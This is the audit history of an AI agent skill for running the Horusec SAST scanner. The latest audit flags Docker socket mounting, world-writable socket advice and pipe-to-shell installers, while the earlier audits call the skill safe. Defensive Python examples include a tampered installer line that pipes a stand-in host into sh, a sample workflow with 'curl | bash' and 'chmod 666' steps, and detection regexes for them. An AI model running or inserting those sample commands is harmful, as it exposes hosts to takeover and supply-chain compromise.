Skill sast-horusec: Audit History

Audit History

sast-horusec - 6 audits

Audit version 6

Latest: High risk

Jun 28, 2026, 06:08 AM

Static analysis flagged many command, network, environment, filesystem, and script patterns. Most findings are documentation examples or legitimate SAST workflow guidance, but the Docker socket mount, world-writable Docker socket advice, and pipe-to-shell installers are confirmed high-risk operational patterns. No evidence found of prompt injection or confirmed malicious intent, so the skill is not blocked but should not be published without revisions.

Files scanned: 5
Lines analyzed: 1,876
Findings: 13
Auditor: codex

High-risk issues (3)

Docker Socket Mounted Into Scanner Container
TRUE_POSITIVE: The skill recommends running Horusec with /var/run/docker.sock mounted into the container. Docker socket access can give a container control over the host Docker daemon, which is a high-impact privilege boundary risk even when used for legitimate scanning.
World-Writable Docker Socket Permission Advice
TRUE_POSITIVE: The troubleshooting section advises chmod 666 on /var/run/docker.sock. This grants local users broad access to the Docker daemon and can enable host compromise through container creation.
Pipe-To-Shell Installer Commands
TRUE_POSITIVE: The skill and CI template include commands that download remote shell scripts and pipe them directly to bash. This creates supply-chain risk because the executed content is not pinned, verified, or reviewed before execution.
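The remedy for the pipe-to-shell finding is to split "download" from "execute": fetch the installer to disk, compare its SHA-256 with a digest pinned in the repository, and run it only on a match. The following is an added example written for this page, not code from the skill, its CI template, or Horusec. The installer bytes and the `https://example.invalid/...` URL inside `demo()` are constructed so the check runs offline; `http_fetch()` is the fetcher a caller would pass in a real pipeline.

```python
"""Fetch-verify-execute replacement for "curl ... | bash". Added example, not
the skill's own code. The installer bytes and URL in demo() are constructed so
the check runs offline; http_fetch() is what a caller would pass in production."""
import hashlib
import hmac
import subprocess
import tempfile
import urllib.request
from pathlib import Path
from typing import Callable, Optional

Fetcher = Callable[[str], bytes]


def http_fetch(url: str) -> bytes:
    """Plain HTTPS download of the installer body (not used by demo())."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        return resp.read()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def fetch_verified(url: str, expected_sha256: str, fetch: Fetcher, dest: Path) -> bool:
    """Download via `fetch`; write `dest` only if the SHA-256 equals the pinned
    digest. Nothing touches disk on a mismatch, so nothing can be executed."""
    data = fetch(url)
    if not hmac.compare_digest(sha256_hex(data), expected_sha256.lower()):
        return False
    dest.write_bytes(data)
    dest.chmod(0o700)                      # owner-only, never world-writable
    return True


def run_verified_installer(url: str, expected_sha256: str, fetch: Fetcher) -> Optional[int]:
    """Run the installer with sh only after verification; None means it was
    refused. The script lives in a private temp dir that is removed afterwards."""
    with tempfile.TemporaryDirectory() as tmp:
        script = Path(tmp) / "install.sh"
        if not fetch_verified(url, expected_sha256, fetch, script):
            return None
        return subprocess.run(["sh", str(script)], check=False).returncode


def demo() -> dict:
    """Exercise the check with a constructed installer and a tampered copy."""
    url = "https://example.invalid/install.sh"              # constructed
    genuine = b"#!/bin/sh\necho 'installer ran'\n"
    pinned = sha256_hex(genuine)   # in practice: a digest committed to the repo
    tampered = genuine + b"curl https://example.invalid/x | sh\n"
    with tempfile.TemporaryDirectory() as tmp:
        good_dest, bad_dest = Path(tmp) / "good.sh", Path(tmp) / "bad.sh"
        return {
            "genuine_verified": fetch_verified(url, pinned, lambda _: genuine, good_dest),
            "genuine_written": good_dest.exists(),
            "tampered_verified": fetch_verified(url, pinned, lambda _: tampered, bad_dest),
            "tampered_written": bad_dest.exists(),
            "tampered_run": run_verified_installer(url, pinned, lambda _: tampered),
        }


if __name__ == "__main__":
    print(demo())
```

The pinned digest belongs in the repository next to the workflow (reviewed like any other change), which is what makes the download "pinned, verified, and reviewed" in the sense the finding asks for; a digest fetched from the same remote as the installer would verify nothing.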
Medium-risk issues (2)
Extensive Shell Execution Guidance
NEEDS_REVIEW: The skill is designed to run security scanners, Docker commands, package installers, and report-processing commands. This is expected for a Horusec workflow, but users could run commands against sensitive repositories or CI systems without sandboxing.
CI Token And Repository Automation Exposure
NEEDS_REVIEW: The CI template uses a GitHub token for Gitleaks and reads a generated report before posting a pull request comment. These are legitimate GitHub Actions patterns, but they require least-privilege permissions and careful artifact handling.
Low-risk issues (3)
Intentional Vulnerable Code Examples
FALSE_POSITIVE: The hardcoded secrets, weak cryptography, XSS, C2, and reconnaissance terms appear inside security-rule templates or reference examples. They document what a scanner should detect rather than implementing malicious behavior.
Documentation URLs And Reference Links
FALSE_POSITIVE: Hardcoded URLs point to Horusec documentation, OWASP, CWE, and security tooling references. These are normal documentation links and do not by themselves indicate data exfiltration.
Environment Variable Examples Are Mostly Defensive
FALSE_POSITIVE: Environment variable references are used for GitHub Actions secrets or examples showing how to avoid hardcoded credentials. This is safer than embedding secrets directly, but users should still protect scan results.

Detected patterns

Privileged Docker Socket Bind Mount
World-Writable Docker Socket
Remote Installer Piped To Bash
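The three detected patterns above, and the least-privilege point from the medium-risk GitHub token finding, are simple enough to lint for before a skill or CI template is published. The following detector is an added example written for this page, not the audit tooling's or Horusec's own code. The three Docker/installer rule names are taken from the page's "Detected patterns"; the fourth rule name, "Overly Broad Workflow Token Permissions", and the sample workflow it scans are this example's own constructions.

```python
"""Lint a CI workflow or skill document for the operational patterns this audit
flagged. Added example, not the skill's or Horusec's own code. The sample
workflow below is constructed; the three Docker/installer rule names mirror the
audit's "Detected patterns", the permissions rule is an extra check suggested
by the medium-risk GitHub token finding."""
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    line_no: int
    pattern: str
    text: str


def _world_writable(mode: str) -> bool:
    """True if a chmod mode grants write to 'others' (numeric or symbolic)."""
    if mode.isdigit():
        return int(mode[-1]) & 0o2 == 0o2          # others' write bit
    m = re.fullmatch(r"([ugoa]*)([+=])([rwxXst]*)", mode)
    if not m:
        return False
    who, _, perms = m.groups()
    # "+w" with no "who" applies to everyone (subject to umask), so count it
    return "w" in perms and (who == "" or "o" in who or "a" in who)


# (name, regex, accept(match)); a finding is emitted when regex matches and
# accept() returns True. Lines are matched one at a time, so ^ is line start.
RULES = [
    ("Privileged Docker Socket Bind Mount",
     re.compile(r"(?:(?<![\w-])-v\s+|--volume[=\s]+|--mount\s+\S*source=|^\s*-\s+)"
                r"['\"]?/var/run/docker\.sock(?=[:'\"\s,]|$)"),
     lambda m: True),
    ("World-Writable Docker Socket",
     re.compile(r"\bchmod\s+(?:-\S+\s+)*(\S+)\s+['\"]?/var/run/docker\.sock\b"),
     lambda m: _world_writable(m.group(1))),
    ("Remote Installer Piped To Bash",
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+(?:-E\s+)?)?(?:ba|z|da)?sh\b"),
     lambda m: True),
    ("Overly Broad Workflow Token Permissions",   # name is this example's own
     re.compile(r"^\s*permissions:\s*write-all\b"),
     lambda m: True),
]


def scan_text(text: str) -> List[Finding]:
    """Return every rule hit in `text`, ordered by line number."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, rx, accept in RULES:
            m = rx.search(line)
            if m and accept(m):
                findings.append(Finding(line_no, name, line.strip()))
    return findings


# Constructed GitHub Actions workflow mixing flagged and acceptable lines.
SAMPLE_WORKFLOW = """\
name: horusec-scan
permissions: write-all
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - run: curl -fsSL https://example.invalid/install.sh | bash
      - run: sudo chmod 666 /var/run/docker.sock
      - run: docker run -v /var/run/docker.sock:/var/run/docker.sock -v "$PWD":/src scanner-image:latest scan /src
      - run: wget -qO- https://example.invalid/gitleaks.sh | sudo sh
      - run: chmod 660 /var/run/docker.sock
      - run: curl -fsSLo install.sh https://example.invalid/install.sh && sha256sum -c install.sh.sha256
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_WORKFLOW):
        print(f"line {f.line_no}: {f.pattern}: {f.text}")
```

On the sample, the `chmod 660` line and the download-then-`sha256sum -c` line produce no finding, which is the point: the same commands become acceptable once the socket is not world-writable and the installer is verified before it runs. The regexes are deliberately loose (shell `run:` steps, `docker run` flags, and compose-style `volumes:` entries all match); treat hits as review prompts, not verdicts.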

Audit version 5

Safe

Jan 16, 2026, 04:03 PM

Documentation-only skill containing no executable code. All static findings are false positives - patterns detected are legitimate documentation examples showing vulnerable code patterns that the Horusec scanner is designed to detect. Docker socket references and command examples are for running the Horusec CLI tool, not for malicious purposes. All URLs point to legitimate security resources (Horusec, OWASP, CWE).

Files scanned: 6
Lines analyzed: 2,097
Findings: 5
Auditor: claude
No security issues found

Risk factors

⚙️ External commands (99)
assets/ci-config-template.yml:298 assets/ci-config-template.yml:301 assets/ci-config-template.yml:304 assets/ci-config-template.yml:307 assets/ci-config-template.yml:310 assets/ci-config-template.yml:134 assets/ci-config-template.yml:250 assets/ci-config-template.yml:291 references/EXAMPLE.md:54-74 references/EXAMPLE.md:74-95 references/EXAMPLE.md:95-108 references/EXAMPLE.md:108-111 references/EXAMPLE.md:111-118 references/EXAMPLE.md:118-122 references/EXAMPLE.md:122-129 references/EXAMPLE.md:129-135 references/EXAMPLE.md:135-151 references/EXAMPLE.md:151-154 references/EXAMPLE.md:154-162 references/EXAMPLE.md:162-296 references/EXAMPLE.md:296-306 references/EXAMPLE.md:306-309 references/EXAMPLE.md:309-318 references/EXAMPLE.md:318-333 references/EXAMPLE.md:333-342 references/EXAMPLE.md:342-346 references/EXAMPLE.md:346-354 references/EXAMPLE.md:354-358 references/EXAMPLE.md:358-361 references/EXAMPLE.md:361-371 references/EXAMPLE.md:371-404 references/EXAMPLE.md:404-414 references/EXAMPLE.md:414-447 references/EXAMPLE.md:447-451 references/EXAMPLE.md:451-472 references/EXAMPLE.md:472-476 references/EXAMPLE.md:476-537 references/WORKFLOW_CHECKLIST.md:74 SKILL.md:37-44 SKILL.md:44-54 SKILL.md:54-56 SKILL.md:56-80 SKILL.md:80-82 SKILL.md:82-85 SKILL.md:85 SKILL.md:85-94 SKILL.md:94-96 SKILL.md:96-98 SKILL.md:98-99 SKILL.md:99-104 SKILL.md:104-111 SKILL.md:111-113 SKILL.md:113-144 SKILL.md:144-150 SKILL.md:150-151 SKILL.md:151-152 SKILL.md:152-154 SKILL.md:154-155 SKILL.md:155-157 SKILL.md:157-165 SKILL.md:165-169 SKILL.md:169-177 SKILL.md:177-182 SKILL.md:182-189 SKILL.md:189-190 SKILL.md:190-194 SKILL.md:194-210 SKILL.md:210-217 SKILL.md:217-220 SKILL.md:220-228 SKILL.md:228-231 SKILL.md:231-237 SKILL.md:237-255 SKILL.md:255-258 SKILL.md:258-263 SKILL.md:263-267 SKILL.md:267-272 SKILL.md:272-277 SKILL.md:277-282 SKILL.md:282-285 SKILL.md:285-293 SKILL.md:293-302 SKILL.md:302-305 SKILL.md:305-307 SKILL.md:307-315 SKILL.md:315-321 SKILL.md:321-327 SKILL.md:327-334 
SKILL.md:334-340 SKILL.md:340-349 SKILL.md:40 SKILL.md:40 SKILL.md:214 SKILL.md:234 SKILL.md:37-44 SKILL.md:210-217 SKILL.md:231-237 SKILL.md:256 SKILL.md:257
🌐 Network access (22)
📁 Filesystem access (2)
🔑 Environment variables (27)
⚡ Contains scripts (2)

Audit version 4

Safe

Jan 16, 2026, 04:03 PM

Documentation-only skill containing no executable code. All static findings are false positives - patterns detected are legitimate documentation examples showing vulnerable code patterns that the Horusec scanner is designed to detect. Docker socket references and command examples are for running the Horusec CLI tool, not for malicious purposes. All URLs point to legitimate security resources (Horusec, OWASP, CWE).

Files scanned: 6
Lines analyzed: 2,097
Findings: 5
Auditor: claude
No security issues found

Risk factors

⚙️ External commands (99)
assets/ci-config-template.yml:298 assets/ci-config-template.yml:301 assets/ci-config-template.yml:304 assets/ci-config-template.yml:307 assets/ci-config-template.yml:310 assets/ci-config-template.yml:134 assets/ci-config-template.yml:250 assets/ci-config-template.yml:291 references/EXAMPLE.md:54-74 references/EXAMPLE.md:74-95 references/EXAMPLE.md:95-108 references/EXAMPLE.md:108-111 references/EXAMPLE.md:111-118 references/EXAMPLE.md:118-122 references/EXAMPLE.md:122-129 references/EXAMPLE.md:129-135 references/EXAMPLE.md:135-151 references/EXAMPLE.md:151-154 references/EXAMPLE.md:154-162 references/EXAMPLE.md:162-296 references/EXAMPLE.md:296-306 references/EXAMPLE.md:306-309 references/EXAMPLE.md:309-318 references/EXAMPLE.md:318-333 references/EXAMPLE.md:333-342 references/EXAMPLE.md:342-346 references/EXAMPLE.md:346-354 references/EXAMPLE.md:354-358 references/EXAMPLE.md:358-361 references/EXAMPLE.md:361-371 references/EXAMPLE.md:371-404 references/EXAMPLE.md:404-414 references/EXAMPLE.md:414-447 references/EXAMPLE.md:447-451 references/EXAMPLE.md:451-472 references/EXAMPLE.md:472-476 references/EXAMPLE.md:476-537 references/WORKFLOW_CHECKLIST.md:74 SKILL.md:37-44 SKILL.md:44-54 SKILL.md:54-56 SKILL.md:56-80 SKILL.md:80-82 SKILL.md:82-85 SKILL.md:85 SKILL.md:85-94 SKILL.md:94-96 SKILL.md:96-98 SKILL.md:98-99 SKILL.md:99-104 SKILL.md:104-111 SKILL.md:111-113 SKILL.md:113-144 SKILL.md:144-150 SKILL.md:150-151 SKILL.md:151-152 SKILL.md:152-154 SKILL.md:154-155 SKILL.md:155-157 SKILL.md:157-165 SKILL.md:165-169 SKILL.md:169-177 SKILL.md:177-182 SKILL.md:182-189 SKILL.md:189-190 SKILL.md:190-194 SKILL.md:194-210 SKILL.md:210-217 SKILL.md:217-220 SKILL.md:220-228 SKILL.md:228-231 SKILL.md:231-237 SKILL.md:237-255 SKILL.md:255-258 SKILL.md:258-263 SKILL.md:263-267 SKILL.md:267-272 SKILL.md:272-277 SKILL.md:277-282 SKILL.md:282-285 SKILL.md:285-293 SKILL.md:293-302 SKILL.md:302-305 SKILL.md:305-307 SKILL.md:307-315 SKILL.md:315-321 SKILL.md:321-327 SKILL.md:327-334 
SKILL.md:334-340 SKILL.md:340-349 SKILL.md:40 SKILL.md:40 SKILL.md:214 SKILL.md:234 SKILL.md:37-44 SKILL.md:210-217 SKILL.md:231-237 SKILL.md:256 SKILL.md:257
🌐 Network access (22)
📁 Filesystem access (2)
🔑 Environment variables (27)
⚡ Contains scripts (2)

Audit version 3

Safe

Jan 10, 2026, 10:57 AM

This skill contains only documentation and configuration templates. No executable scripts, no network calls, and no direct filesystem access. The skill guides users on how to use the Horusec CLI tool which they install separately. Pure documentation-based skill with no code execution capabilities.

Files scanned: 5
Lines analyzed: 1,876
Findings: 0
Auditor: claude
No security issues found

Audit version 2

Safe

Jan 10, 2026, 10:57 AM

This skill contains only documentation and configuration templates. No executable scripts, no network calls, and no direct filesystem access. The skill guides users on how to use the Horusec CLI tool which they install separately. Pure documentation-based skill with no code execution capabilities.

Files scanned: 5
Lines analyzed: 1,876
Findings: 0
Auditor: claude
No security issues found

Audit version 1

Safe

Jan 10, 2026, 10:57 AM

This skill contains only documentation and configuration templates. No executable scripts, no network calls, and no direct filesystem access. The skill guides users on how to use the Horusec CLI tool which they install separately. Pure documentation-based skill with no code execution capabilities.

Files scanned: 5
Lines analyzed: 1,876
Findings: 0
Auditor: claude
No security issues found